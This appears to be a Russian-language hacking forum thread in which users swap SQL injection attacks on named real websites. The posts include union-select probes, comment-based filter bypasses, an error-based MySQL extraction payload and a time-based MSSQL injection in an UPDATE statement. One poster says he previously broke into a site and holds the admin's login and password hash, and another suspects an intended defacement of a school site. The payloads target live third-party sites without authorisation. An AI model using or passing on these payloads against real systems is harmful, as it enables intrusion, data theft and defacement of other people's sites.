http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+ идет фильтрация кавычек... как можно обойти? заранее спс и вот еще интересная http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*
а кавычки тут и не нужны, параметр-то числовой почему не работает юнион: http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true помимо гета есть еще и пост
не катит, выдает Can't execute query SELECT * FROM families WHERE CatID=32 and substring(version(),1,1)=3 true AND date_archived IS NULL ORDER BY orderval Error: You have an error in your SQL syntax near 'true AND date_archived IS NULL ORDER BY orderval' at line 1 может я что то не так делаю... хз..
ввожу http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 выдает норм страницу... Вы строго не судите меня, я новичок в этом святом деле=) и если можно , то прошу объяснить принцып действия тут вот этого именно подбор полей как происходит? типа этого? или дайте линк...
https://forum.antichat.ru/thread18552-blind+sql.html - вот это https://rdot.org/forum/showthread.php?t=245 - потом это https://rdot.org/forum/showthread.php?t=503 - и напоследок согласно 3 ссылке и описанному там методу MySQL 3 error based inj, раскручивать её можно через вывод в ошибке, т.е (лишние пробелы, вставляемые форумом, убрать) Code: http://www.hawkingtech.com/products/index.php?CatID=32+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+
Уверн, он просто хочет сломать сайт школы и написать "Галина Сергеевна- дура!!!", т.к. сам учится в этой школе и хочет обосрать математичку/информатичку/директора.
Кстати тоже хотельсьбы узнать (ради опыта) как можно провернуть инъекцию... пробовал +union+select+N-- /**/union/**/select/**/N/* /**//*!union*//**//*!select*//**/N-- так вообще ноль
Cold fusion это интерпретируемый язык, а пхп админские панели для управления субд пишутся изходя из различия именно СУБД а не ЯП, так есть phpMyAdmin (для mysql), phpPgAdmin (для постгрес), phpMSAdmin (для MS SQL) и тп вопрос не очень то корректный, если на сайте интерпретируются только скрипты cfm, то искать панели пхп не имеет смысла
взгляните опытным взглядом http://www.pwlvl.ru/news/?page=-2 я его раньше ломал, потом ту дырку прикрыли (остался долько логин и md5(пароль) админа))
Привет. На сайте есть инъекция (mssql) в POST запросе (при редактировании профиля). Как я понял инъекция в операторе UPDATE... addressDef=-1,'0','0','0','0','0','0','0','0';waitfor+delay+'00:00:10'-- Есть ли возможность получать данные если на место waitfordelay влепить select @@version к примеру? Пробовал конвертировать в int - ошибки не возникало...
